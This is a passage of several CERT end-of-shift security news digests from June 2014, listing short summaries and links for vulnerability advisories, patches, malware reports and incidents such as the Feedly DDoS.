A vulnerability was reported in IBM AIX. A remote user can conduct amplified denial of service attacks.
A remote user can exploit an administrative query function in ntpd to amplify distributed denial of service (DDoS) attacks against other sites.
---------------------------------------------
http://www.securitytracker.com/id/1030433
*** Hacking the Java Debug Wire Protocol - or - 'How I met your Java debugger' ***
---------------------------------------------
In this post, I will explain the Java Debug Wire Protocol (JDWP) and why it is interesting from a pentester's point of view. I will cover some JDWP internals and how to use them to perform code execution, resulting in a reliable and universal exploitation script. ... As a matter of fact, JDWP is used quite a lot in the Java application world. Pentesters might, however, not see it that often when performing remote assessments as firewalls would (and should) mostly block the port it is
---------------------------------------------
http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.ht…
*** CVE-2014-4049 php: heap-based buffer overflow in DNS TXT record parsing ***
---------------------------------------------
A malicious server or man-in-the-middle attacker could possibly use this flaw to execute arbitrary code as the PHP interpreter if a PHP application uses dns_get_record() to perform a DNS query.
---------------------------------------------
https://bugzilla.redhat.com/show_bug.cgi?id=1108447
*** SLocker Android Ransomware Communicates Via Tor And SMS ***
---------------------------------------------
A little over two weeks ago, we found a new family of Android ransomware: SLocker. We have no evidence that SLocker is related to Koler, the most recently discovered Android ransomware. It does however carry through on the threat Koler made. Unlike Koler - which pretended to, but didn't actually encrypt files - SLocker will actually scan the device's SD card for specific file types: When the SLocker app is launched, it encrypts these files and then displays a ransom message: The message
---------------------------------------------
http://www.f-secure.com/weblog/archives/00002716.html
*** Microsoft seals OneDrive links ***
---------------------------------------------
The document-sharing feature of Microsoft's cloud storage had a hole that would have allowed attackers to gain unauthorized access to documents. Microsoft has now closed the gap, but older sharing URLs could still be vulnerable.
---------------------------------------------
http://www.heise.de/security/meldung/Microsoft-dichtet-OneDrive-Links-ab-22…
*** Technology sites "riskier" than illegal sites in 2013, according to Symantec data ***
---------------------------------------------
The 'riskiest' pages to visit in 2013 were technology websites, according to data from users of Norton Web Safe, which monitors billions of traffic requests and millions of software downloads per day.
---------------------------------------------
http://www.scmagazine.com/technology-sites-riskier-than-illegal-sites-in-20…
*** Popular HTTPS Sites Still Vulnerable to OpenSSL Connection Hijacking Attack ***
---------------------------------------------
Some of the Internet's most visited websites that encrypt data with the SSL protocol are still susceptible to a recently announced vulnerability that could allow attackers to intercept and decrypt connections.
---------------------------------------------
http://www.cio.com/article/754250/Popular_HTTPS_Sites_Still_Vulnerable_to_O…
*** Researchers Outline Spammers' Business Ecosystem ***
---------------------------------------------
An anonymous reader writes: A team of researchers at the UC Santa Barbara and RWTH Aachen presented new findings on the relationship of spam actors [abstract; full paper here] at the ACM Symposium on Information, Computer and Communications Security. This presents the first end-to-end analysis of the spam delivery ecosystem, including: harvesters crawl the web and compile email lists, botmasters infect and operate botnets, and spammers rent botnets and buy email lists to run spam campaigns.
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/-AKpHVGH5us/story01.htm
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 13-06-2014 18:00 − Monday 16-06-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** BlackEnergy Rootkit, Sort of ***
---------------------------------------------
A sample of the BlackEnergy family was recently uploaded to VirusTotal from Ukraine. The family is allegedly the same malware used in the cyber attack against Georgia in 2008. The malware provides attackers full access to their infected hosts. Check out SecureWorks' detailed analysis from 2010 for more information about the family. The new sample is not much of a rootkit anymore, in the sense that it no longer hides files, ..
---------------------------------------------
http://www.f-secure.com/weblog/archives/00002715.html
*** Pre-installed Trojan found on Chinese S4 clone ***
---------------------------------------------
Spyware reads out sensitive data and lets the device be turned into a listening bug.
---------------------------------------------
http://derstandard.at/2000002023277
*** Notice for Debian users on the OpenSSL upgrade ***
---------------------------------------------
6 June 2014. Again, OpenSSL was the centre of patching in the last two days. While Debian was quick to release a patched version, it seems like Debian forgot to make sure that some services which link against openssl (libssl) get restarted. Here is how you can check which services use ..
---------------------------------------------
http://www.cert.at/services/blog/20140606123624-1163.html
*** Ruling Raises Stakes for Cyberheist Victims ***
---------------------------------------------
A Missouri firm that unsuccessfully sued its bank to recover $440,000 stolen in a 2010 cyberheist may now be on the hook to cover the financial institution's legal fees, an appeals court has ruled. Legal experts say the decision is likely to discourage future victims from pursuing such cases.
---------------------------------------------
http://krebsonsecurity.com/2014/06/ruling-raises-stakes-for-cyberheist-vict…
*** Defending against brute-force attacks on wp-login.php ***
---------------------------------------------
Brute-force attacks on WordPress blogs are currently being carried out at an increased rate. We too are registering an increase in such attacks. [...] In the following we show you how you can curb the success of such attacks.
---------------------------------------------
http://blog.initiative-s.de/2013/04/bruteforce-angriffe-auf-wp-login-php-ab…
*** One-third of cyber attacks take hours to detect ***
---------------------------------------------
More than one-third of cyber attacks take hours to detect. Even more alarming, resolving breaches takes days, weeks, and in some cases, even ..
---------------------------------------------
http://www.net-security.org/secworld.php?id=17005
*** End-to-end encryption for BlackBerry Messenger ***
---------------------------------------------
BlackBerry Messenger gets end-to-end encryption with BBM Protected, initially only in the stricter Regulated mode, without BlackBerry Balance or Android and iOS clients.
---------------------------------------------
http://www.heise.de/security/meldung/Ende-zu-Ende-Verschluesselung-fuer-Bla…
*** German successor to TrueCrypt announced ***
---------------------------------------------
The open-source encryption project TrueCrypt, discontinued for reasons that are not entirely clear, has a new candidate for its succession. The announced software has its direct origin in TrueCrypt.
---------------------------------------------
http://www.heise.de/ix/meldung/Deutscher-Nachfolger-fuer-TrueCrypt-angekuen…
*** Towelroot cracks Android in seconds ***
---------------------------------------------
Geohot has unexpectedly released a tool that is said to be able to root almost all Android devices. In a first test it worked surprisingly well. But with it he also demonstrates a fatal security vulnerability.
---------------------------------------------
http://www.heise.de/security/meldung/Towelroot-knackt-Android-in-Sekunden-2…
*** Multiple vulnerabilities in Openfiler ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/93764
http://xforce.iss.net/xforce/xfdb/93763
http://xforce.iss.net/xforce/xfdb/93762
http://xforce.iss.net/xforce/xfdb/93761
*** Bugtraq: [SE-2014-01] Security vulnerabilities in Oracle Database Java VM ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532433
*** Asterisk MixMonitor Lets Remote Authenticated Users Execute Arbitrary Shell Commands ***
---------------------------------------------
http://www.securitytracker.com/id/1030426
*** PostgreSQL 8.4.1 Denial Of Service Integer Overflow ***
---------------------------------------------
PostgreSQL is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data before...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014060082
*** PowerDNS in default configuration is vulnerable to DoS attack ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014060083
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 12-06-2014 18:00 − Friday 13-06-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Microsoft pulls the "Secure Boot" brake ***
---------------------------------------------
With an update for Windows 8, Server 2012, 8.1 and Server 2012 R2, Microsoft installs new key databases that block the start of some UEFI modules.
---------------------------------------------
http://www.heise.de/security/meldung/Microsoft-zieht-die-Secure-Boot-Bremse…
*** Setting HoneyTraps with ModSecurity: Adding Fake Hidden Form Fields ***
---------------------------------------------
This blog post continues with the topic of setting "HoneyTraps" within your web applications to catch attackers. Please review the previous posts for more examples: Project Honeypot Integration, Unused Web Ports, Adding Fake robots.txt Entries, Adding Fake HTML Comments. This blog post will discuss Recipe 3-4: Adding Fake Hidden Form Fields from my book "Web Application Defender's Cookbook: Battling Hackers and Protecting Users". Recipe 3-4: Adding Fake Hidden Form Fields
---------------------------------------------
http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/btSzvx21q3s/setting-ho…
*** Hacker claims PayPal loophole generates FREE MONEY ***
---------------------------------------------
Convicted hacker comes good with fraudster flowchart. A PayPal loophole can be exploited to earn free cash, according to a convicted former NASA hacker turned white hat.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/06/13/hacker_clai…
*** You have no SQL inj--... sorry, NoSQL injections in your application ***
---------------------------------------------
Everyone knows about SQL injections. They are classic, first widely publicized by Rain Forest Puppy, and still widely prevalent today (hint: don't interpolate query string params with SQL).
But who cares? SQL injections are so ten years ago. I want to talk about a vulnerability I hadn't run into before that I recently had a lot of fun exploiting. It was a NoSQL injection.
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/06/12/you-have-…
*** Banking malware using Windows to block anti-malware apps ***
---------------------------------------------
BKDR_VAWTRAK is using Software Restriction Policies to restrict security software.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/s0xxmloC9XA/
*** Mergers and Acquisitions: When Two Companies and APT Groups Come Together ***
---------------------------------------------
With Apple's purchase of Beats, Pfizer's failed bids for AstraZeneca, and financial experts pointing to a rally in the M&A market, the last month was a busy one for mergers and acquisitions. Of course, when we first see headlines of...
---------------------------------------------
http://www.fireeye.com/blog/technical/targeted-attack/2014/06/mergers-and-a…
*** Microsoft's June patches can destroy Office 2013 installations ***
---------------------------------------------
The Office 2013 patches from 11 June sometimes cause major problems and can result in the Office programs no longer starting.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Microsofts-Juni-Patches-koennen-Offi…
*** How iOS 8 Will Affect the Security of iPhones and iPads ***
---------------------------------------------
Apple's mobile OS has been enhanced, but is it more secure?
---------------------------------------------
http://www.symantec.com/connect/blogs/how-ios-8-will-affect-security-iphone…
*** Stratfor hack: secret report finds serious security gaps ***
---------------------------------------------
An investigation following the break-in into the Stratfor servers by the group Antisec has found that the company failed to observe the most important security measures.
---------------------------------------------
http://www.golem.de/news/stratfor-hack-geheimer-bericht-stellt-gravierende-…
*** CloudFlare offers free DDoS protection to public interest websites ***
---------------------------------------------
A project launched by CloudFlare, a provider of website performance and security services, allows organizations engaged in news gathering, civil society and political or artistic speech to use the company's distributed denial-of-service (DDoS) protection technology for free. The goal of the project, dubbed Galileo, is to protect freedom of expression on the Web by keeping sites with public interest information from being censored through online attacks, according to the San Francisco-based
---------------------------------------------
http://www.csoonline.com/article/2363382/cloudflare-offers-free-ddos-protec…
*** ISC Patches Critical DoS Vulnerability in BIND ***
---------------------------------------------
A critical, remotely exploitable bug in some BIND domain name system (DNS) servers could cause a denial of service situation and trigger them to crash.
---------------------------------------------
http://threatpost.com/isc-patches-critical-dos-vulnerability-in-bind/106653
*** CVE-2014-3859: BIND named can crash due to a defect in EDNS printing processing ***
---------------------------------------------
A specially crafted query sent to a BIND nameserver can cause it to crash with a REQUIRE assertion error.
---------------------------------------------
https://kb.isc.org/article/AA-01166/74/CVE-2014-3859:-BIND-named-can-crash-…
*** IBM Security Bulletin: IBM Algo One - cryptographic key information discovery (CVE-2014-0076) ***
---------------------------------------------
Under certain circumstances, a local attacker could discover cryptographic key information from IBM Algo One. CVE(s): CVE-2014-0076 Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21675765
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL ***
---------------------------------------------
Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL CVE(s): CVE-2010-5298 Affected product(s) and affected version(s): AIX 5.3, 6.1 and 7.1 VIOS 2.X Refer to the following reference URLs for remediation and additional vulnerability details: Source Bulletin: http://aix.software.ibm.com/aix/efixes/security/openssl_advisory8.asc X-Force Database: http://xforce.iss.net/xforce/xfdb/92632
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/race_condition_in_the…
*** IBM Security Advisory for AIX ***
---------------------------------------------
AIX OpenSSL SSL/TLS Man In The Middle (MITM) vulnerability
AIX OpenSSL DTLS recursion flaw
AIX OpenSSL DTLS invalid fragment vulnerability
AIX OpenSSL SSL_MODE_RELEASE_BUFFERS NULL pointer dereference
AIX OpenSSL Anonymous ECDH denial of service
---------------------------------------------
http://aix.software.ibm.com/aix/efixes/security/openssl_advisory9.asc
*** Cisco Autonomic Networking Infrastructure Overwrite Vulnerability ***
---------------------------------------------
CVE-2014-3290
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** DSA-2958 apt ***
---------------------------------------------
security update
---------------------------------------------
http://www.debian.org/security/2014/dsa-2958
*** DSA-2957 mediawiki ***
---------------------------------------------
security update
---------------------------------------------
http://www.debian.org/security/2014/dsa-2957
*** VMSA-2014-0006.1 ***
---------------------------------------------
VMware product updates address OpenSSL security vulnerabilities
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2014-0006.html
*** Yealink VoIP Phones XSS / CRLF Injection ***
---------------------------------------------
Topic: Yealink VoIP Phones XSS / CRLF Injection. Risk: Low. Text: I. ADVISORY: CVE-2014-3427 CRLF Injection in Yealink VoIP Phones; CVE-2014-3428 XSS vulnerabilities in Yealink VoIP Phones ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014060079
*** SSA-963338 (Last Update 2014-06-13): Multiple Buffer Overflows in UPnP Interface of OZW and OZS Products ***
---------------------------------------------
https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit…
*** Bugtraq: AST-2014-005: Remote Crash in PJSIP Channel Drivers Publish/Subscribe Framework ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532414
*** Bugtraq: AST-2014-007: Exhaustion of Allowed Concurrent HTTP Connections ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532415
*** HPSBUX03046 SSRT101590 rev.1 - HP-UX Running OpenSSL, Remote Denial of Service (DoS), Code Execution, Security Restriction Bypass, Disclosure of Information, or Unauthorized Access ***
---------------------------------------------
Potential security vulnerabilities have been identified with HP-UX running OpenSSL. These vulnerabilities could be exploited remotely to create a Denial of Service (DoS), execute code, bypass security restrictions, disclose information, or allow unauthorized access.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 11-06-2014 18:00 − Thursday 12-06-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Weekly Metasploit Update: Meterpreter Madness ***
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/06/11/weekly-me…
*** MSRT June 2014 - Necurs ***
---------------------------------------------
This month we added Win32/Necurs to the Microsoft Malicious Software Removal Tool (MSRT). In a previous blog about Necurs I outlined the family's prevalence and the techniques it uses to execute its payload. In this blog, I will discuss the Necurs rootkit components Trojan:WinNT/Necurs.A and Trojan:Win64/Necurs.A in greater depth. These Necurs rootkit components are sophisticated drivers that try to block security products during every stage of Windows startup. It's important to note that...
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2014/06/10/msrt-june-2014-necurs.as…
*** Gmail Bug Could Have Exposed Every User's Address ***
---------------------------------------------
Security tester Oren Hafif says that he found and helped fix a bug in Google's Gmail service that could have been used to extract millions of Gmail addresses, if not all of them, in a matter of days or weeks.
---------------------------------------------
http://feeds.wired.com/c/35185/f/661467/s/3b66e7a5/sc/4/l/0L0Swired0N0C20A1…
*** Small businesses running cloud-based POS software hit with unique POSCLOUD malware ***
---------------------------------------------
Researchers with IntelCrawler have identified a unique type of malware, known as POSCLOUD, which targets cloud-based point-of-sale software.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/PLQgnJ1-_Mc/
*** Yahoo Toolbar triggers XSS in Google, other popular services, researcher finds ***
---------------------------------------------
A researcher discovered that Yahoo Toolbar triggers XSS in highly popular services, which could enable an attacker to hijack accounts.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/rM026xMWg8U/
*** Feedly and Evernote Hit by DDoS Attacks, Extortion Demands ***
---------------------------------------------
Yesterday, the most popular RSS reader Feedly was down as a result of a large-scale distributed denial-of-service (DDoS) attack carried out by cybercriminals to extort money. On Wednesday, Feedly was temporarily unavailable for its users. Feedly posted details of the attack at 5:00 AM ET on its blog, saying that they were under a Distributed Denial of Service (DDoS) attack and
---------------------------------------------
http://feedproxy.google.com/~r/TheHackersNews/~3/9ZGb8CUzJwg/feedly-and-eve…
*** RSS service: Feedly is reachable again ***
---------------------------------------------
After an outage of nearly 24 hours, the RSS service Feedly is usable again. Criminals carried out a DDoS attack against the Feedly servers and demanded a payment to end the attack.
---------------------------------------------
http://www.golem.de/news/rss-dienst-feedly-ist-wieder-erreichbar-1406-10713…
*** Feedly under DDoS fire again ***
---------------------------------------------
The cyber-extortionists who took down the newsreader service Feedly on Wednesday are apparently not giving up. The service is once again unreachable.
---------------------------------------------
http://www.heise.de/security/meldung/Feedly-wieder-unter-DDoS-Beschuss-2220…
*** TweetDeck with a heart defect ***
---------------------------------------------
Due to a bug, the Twitter client executed JavaScript code embedded in tweets when a Unicode heart was appended to it.
---------------------------------------------
http://www.heise.de/security/meldung/TweetDeck-mit-Herzfehler-2220478.html
*** The Computer Security Threat From Ultrasonic Networks ***
---------------------------------------------
KentuckyFC (1144503) writes: Security researchers in Germany have demonstrated an entirely new way to attack computer networks and steal information without anybody knowing. The new medium of attack is ultrasonic sound. It relies on software that uses the built-in speakers on a laptop to broadcast at ultrasonic frequencies while nearby laptops listen out for the transmissions and pass them on, a setup known as a mesh network. The team has tested this kind of attack on a set of Lenovo T400...
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/1R8EpiBl880/story01.htm
*** VMware Patches ESXi Against OpenSSL Flaw, But Many Other Products Still Vulnerable ***
---------------------------------------------
While the group of vulnerabilities that the OpenSSL Project patched last week hasn't grown into the kind of mess that the Heartbleed flaw did, the vulnerabilities still affect a huge range of products. Vendors are still making their way through the patching process, and VMware has released an advisory confirming that a long list of...
---------------------------------------------
http://threatpost.com/vmware-patches-esxi-against-openssl-flaw-but-many-oth…
*** Project Un1c0rn Wants to Be the Google for Lazy Security Flaws ***
---------------------------------------------
Following broad security scares like that caused by the Heartbleed bug, it can be frustratingly difficult to find out if a site you use often still has gaping flaws. But a little known community of software developers is trying to change that, by creating a searchable, public index of websites with known security issues.
---------------------------------------------
http://motherboard.vice.com/en_ca/read/is-this-website-vulnerable-to-hacker…
*** Cisco IOS XR Software IPv6 Malformed Packet Denial of Service Vulnerability ***
---------------------------------------------
cisco-sa-20140611-ipv6
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** JSA10628 - 2014-06 Security Bulletin: Junos Pulse Secure Access Service (SSL VPN) and Junos Pulse Access Control Service (UAC): Weak SSL cipher allowed unexpectedly when higher level cipher group is configured (CVE-2014-3812) ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10628&actp=RSS
*** JSA10631 - 2014-06 Security Bulletin: NetScreen Firewall: DNS lookup issue may cause denial of service (CVE-2014-3813) ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10631&actp=RSS
*** JSA10632 - 2014-06 Security Bulletin: NetScreen Firewall: Malformed IPv6 packet DoS issue (CVE-2014-3814) ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10632&actp=RSS
*** JSA10630 - 2014-06 Security Bulletin: Junos WebApp Secure: Local user privilege escalation issue (CVE-2013-2094) ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10630&actp=RSS
*** SA-CONTRIB-2014-060- Petitions - Cross Site Request Forgery (CSRF) ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-060
Project: Petitions (third-party distribution)
Version: 7.x
Date: 2014-June-11
Security risk: Less critical
Exploitable from: Remote
Vulnerability: Cross Site Request Forgery
Description: This distribution enables you to build an application that lets users create and sign petitions. The contained wh_petitions module doesn't sufficiently verify the intent of the user when signing a petition. A malicious user could trick another user into signing a petition they...
---------------------------------------------
https://drupal.org/node/2284571
*** SA-CONTRIB-2014-059 - Touch Theme - Cross Site Scripting (XSS) ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-059
Project: Touch (third-party module)
Version: 7.x
Date: 2014-June-11
Security risk: Moderately critical
Exploitable from: Remote
Vulnerability: Cross Site Scripting
Description: Touch Theme is a lightweight theme with a modern look and feel. The theme does not sufficiently sanitize theme settings input for the Twitter and Facebook username. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "Administer themes". CVE...
---------------------------------------------
https://drupal.org/node/2284415
*** Cisco IOS XR ASR 9000 IPv6 Processing Flaw Lets Remote Users Deny Service ***
---------------------------------------------
http://www.securitytracker.com/id/1030400
*** DSA-2956 icinga ***
---------------------------------------------
security update
---------------------------------------------
http://www.debian.org/security/2014/dsa-2956
*** DSA-2955 iceweasel ***
---------------------------------------------
security update
---------------------------------------------
http://www.debian.org/security/2014/dsa-2955
*** Netscape Portable Runtime API Buffer Overflow May Let Remote Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1030404
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 10-06-2014 18:00 − Wednesday 11-06-2014 18:00
Handler: Stephan Richter
Co-Handler: Robert Waldner
*** Microsoft Security Bulletin Summary for June 2014 - Version: 1.0 ***
---------------------------------------------
This bulletin summary lists security bulletins released for June 2014.
With the release of the security bulletins for June 2014, this bulletin summary replaces the bulletin advance notification originally issued June 5, 2014.
---------------------------------------------
https://technet.microsoft.com/en-us/library/security/MS14-JUN
*** Assessing risk for the June 2014 security updates ***
---------------------------------------------
Today we released seven security bulletins addressing 66 unique CVEs. Two bulletins have a maximum severity rating of Critical while the other five have a maximum severity rating of Important. This table is designed to help you prioritize the deployment of updates appropriately for your environment. Table columns: Bulletin | Most likely attack vector | Max Bulletin Severity | Max XI | Likely first 30 days impact | Platform mitigations and key notes. First row: MS14-035 (Internet Explorer) | Victim browses to a malicious
---------------------------------------------
http://blogs.technet.com/b/srd/archive/2014/06/10/assessing-risk-for-the-ju…
*** Android no longer reveals app permission changes in automatic updates ***
---------------------------------------------
Change could heighten security risks for users.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/KCMtV-_xnqA/
*** May 2014 Cyber Attack Statistics ***
---------------------------------------------
As I noticed previously in these pages, it looks like attackers are just waiting for the summer, since the number of events in May has experienced a noticeable decrease. The Daily Trend Of Attacks chart shows quite a linear trend with two small peaks around 15 and 30 May. Overall the activity appears quite limited.
---------------------------------------------
http://hackmageddon.com/2014/06/11/may-2014-cyber-attack-statistics/
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 06-06-2014 18:00 − Tuesday 10-06-2014 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Microsoft preps seven fixes, two critical, for Patch Tuesday release ***
---------------------------------------------
The critical patches will remediate remote code execution (RCE) bugs in Windows, IE, Office and Microsoft Lync.
---------------------------------------------
http://www.scmagazine.com/microsoft-preps-seven-fixes-two-critical-for-patc…
*** Microsoft wants to eradicate ancient Internet Explorer vulnerability ***
---------------------------------------------
Seven update packages announced for the coming Patch Day - support for XP questionable
---------------------------------------------
http://derstandard.at/2000001862657
*** Security updates available for Adobe Flash Player (APSB14-16) ***
---------------------------------------------
Adobe has released security updates for Adobe Flash Player 13.0.0.214 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.359 and earlier versions for Linux. These updates address vulnerabilities that could potentially allow an attacker to take control of the affected system. Adobe recommends users update their product installations to the latest versions:...
---------------------------------------------
https://helpx.adobe.com/security/products/flash-player/apsb14-16.html
*** Microsoft Fixing Windows 8 Flaws, But Leaving Them In Windows 7 ***
---------------------------------------------
mask.of.sanity sends this news from El Reg: "Microsoft has left Windows 7 exposed by only applying security upgrades to its newest operating systems. Researchers found the gaps after they scanned 900 Windows libraries using a custom diffing tool and uncovered a variety of security functions that were updated in Windows 8 but not in 7. They said the shortcoming could lead to the discovery of zero day vulnerabilities. The missing safe functions were part of Microsoft's dedicated libraries...
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/Rz2E0q7KOps/story01.htm
*** Coordinated malware eradication nears launch ***
---------------------------------------------
Good news: the coordinated malware eradication preparations are almost done. We have held several roundtable meetings at industry events around the world, and the last two are scheduled for June and July. We had insightful conversations with a diverse group of experts from across the antimalware industry. The ideas have converged into a shared vision of how we'll work together to put pressure on the malware ecosystem. I am excited for the first coordinated eradication campaigns to...
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2014/06/04/coordinated-malware-erad…
*** Router security: Fritzbox automatically checks for firmware updates ***
---------------------------------------------
AVM has drawn a consequence from the serious security vulnerability in its routers. A lab version now enables automatic updating of the firmware.
---------------------------------------------
http://www.golem.de/news/routersicherheit-fritzbox-sucht-automatisch-nach-f…
*** Backstage with the Gameover Botnet Hijackers ***
---------------------------------------------
When you're planning to rob the Russian cyber mob, you'd better be sure that you have the element of surprise, that you can make a clean getaway, and that you understand how your target is going to respond. Today's column features an interview with two security experts who helped plan and execute this week's global, collaborative effort to hijack the Gameover Zeus botnet, an extremely resilient and sophisticated crime machine that helped an elite group of thieves steal more than $100 million from
---------------------------------------------
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/QUb7mFxjXlc/
*** Extracting the payload from a CVE-2014-1761 RTF document ***
---------------------------------------------
Background In March Microsoft published security advisory 2953095, detailing a remote code execution vulnerability in multiple versions of Microsoft Office (CVE-2014-1761). A Technet blog was released at the same time which contained excellent information on how a typical malicious document would be constructed. NCC Group's Cyber Defence Operations team used the information in the Technet blog to identify a malicious document within our malware zoo that exploited this vulnerability which...
---------------------------------------------
https://www.nccgroup.com/en/blog/2014/06/extracting-the-payload-from-a-cve-…
*** We've Set Up a One-Click Test For GameOver ZeuS ***
---------------------------------------------
Today we've published a new, quick way to check if your computer is infected by GameOver ZeuS (GOZ). Last week the GOZ botnet was disrupted by international law enforcement together with industry partners, including ourselves. It is of critical importance to realize GOZ was disrupted, not dismantled. It's not technically impossible for the botnet administrators to reclaim control in the near future. More than one million computers are infected by GOZ; time is of the essence. To assist with...
---------------------------------------------
http://www.f-secure.com/weblog/archives/00002712.html
*** Cybercrime costs more than 400 billion dollars worldwide, study says ***
---------------------------------------------
In Austria the damage amounts to 0.41 percent of gross domestic product.
---------------------------------------------
http://derstandard.at/2000001878950
*** "Red Button" Attack Could Compromise Some Smart TVs ***
---------------------------------------------
A vulnerability in an emerging interactive television standard could open up a number of smart TVs to untraceable drive-by attacks.
---------------------------------------------
http://threatpost.com/red-button-attack-could-compromise-some-smart-tvs/106…
*** Chrome OS leaks data to Google before switching on a VPN, says GCHQ ***
---------------------------------------------
UK spy-base wing issues new advice for BlackBerry and Google OSes. The Communications Electronics Security Group (CESG), the part of GCHQ that helps Brits protect secrets from foreign spies (never mind GCHQ), has issued new advice for securing BlackBerry OS 10, Android and Chrome OS 32.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/06/10/security_gu…
*** Zeus Alternative "Pandemiya" Emerges in Cybercrime Underground ***
---------------------------------------------
Pandemiya has all the capabilities that are typical among banking Trojans, such as injecting fake elements into websites, capturing screenshots of the user's computer screen, and encrypting its communications with the control panel. What sets Pandemiya apart from all other banking Trojans is the fact that it has been written from scratch without sharing any source code with Zeus, Fleyder said.
---------------------------------------------
https://www.securityweek.com/zeus-alternative-pandemiya-emerges-cybercrime-…
*** iOS Malware Does Exist ***
---------------------------------------------
Before somebody asks me (again) whether any iOS malware exists, I decided to consolidate the information for you.
---------------------------------------------
https://blog.fortinet.com/iOS-malware-do-exist/
*** Cisco Wireless LAN Controller Cisco Discovery Protocol Denial of Service Vulnerability ***
---------------------------------------------
CVE-2014-3291
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Citrix Security Advisory for OpenSSL Vulnerabilities (June 2014) ***
---------------------------------------------
Severity: High. Overview: The OpenSSL security advisory released on the 5th of June 2014 disclosed six security vulnerabilities in this open source component; these are described below:
---------------------------------------------
http://support.citrix.com/article/CTX140876
*** SAP Hard-Coded Credentials ***
---------------------------------------------
Topic: SAP Hard-Coded Credentials Risk: Medium Text: Onapsis Security Advisories:Multiple Hard-coded Usernames (CWE-798) have been found and patched in a variety of SAP componen...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014060046
*** MediaWiki Input Validation Flaw in Special:PasswordReset Permits Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1030364
*** VU#758382: Unauthorized modification of UEFI variables in UEFI systems ***
---------------------------------------------
Vulnerability Note VU#758382 Unauthorized modification of UEFI variables in UEFI systems Original Release date: 09 Jun 2014 | Last revised: 09 Jun 2014 Overview Certain firmware implementations may not correctly protect and validate information contained in certain UEFI variables. Exploitation of such vulnerabilities could potentially lead to bypass of security features and/or denial of service for the platform. Description According to Corey Kallenberg, Xeno Kovah, John Butterworth, and Sam...
---------------------------------------------
http://www.kb.cert.org/vuls/id/758382
*** Cisco Unified Communications Manager Java Interface SQL Injection Vulnerability ***
---------------------------------------------
CVE-2014-3287
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** WebEx Meeting Server Sensitive Information Disclosure Vulnerability ***
---------------------------------------------
CVE-2014-3294
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Vuln: Cisco Wireless LAN Controller CVE-2014-3291 Denial of Service Vulnerability ***
---------------------------------------------
Cisco Wireless LAN Controller CVE-2014-3291 Denial of Service Vulnerability
---------------------------------------------
http://www.securityfocus.com/bid/67926
*** IBM Security Bulletin: Denial of Service attack possible on Cúram instances using Apache Commons FileUpload (CVE-2014-0050) ***
---------------------------------------------
